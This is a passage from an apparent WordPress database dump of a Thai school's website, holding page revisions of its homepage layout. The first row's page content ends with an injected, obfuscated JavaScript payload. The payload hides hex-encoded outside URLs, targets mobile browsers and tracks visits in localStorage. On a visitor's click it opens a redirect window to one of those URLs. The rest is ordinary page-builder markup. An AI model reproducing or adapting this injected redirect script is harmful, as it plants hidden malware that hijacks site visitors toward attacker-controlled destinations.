)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 21:01:13','2024-08-08 14:01:13','',14,'http://pakhaeng.ssk.in.th/?p=732',0,'revision','',0),
(734,1,'2024-08-08 21:03:44','2024-08-08 14:03:44','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 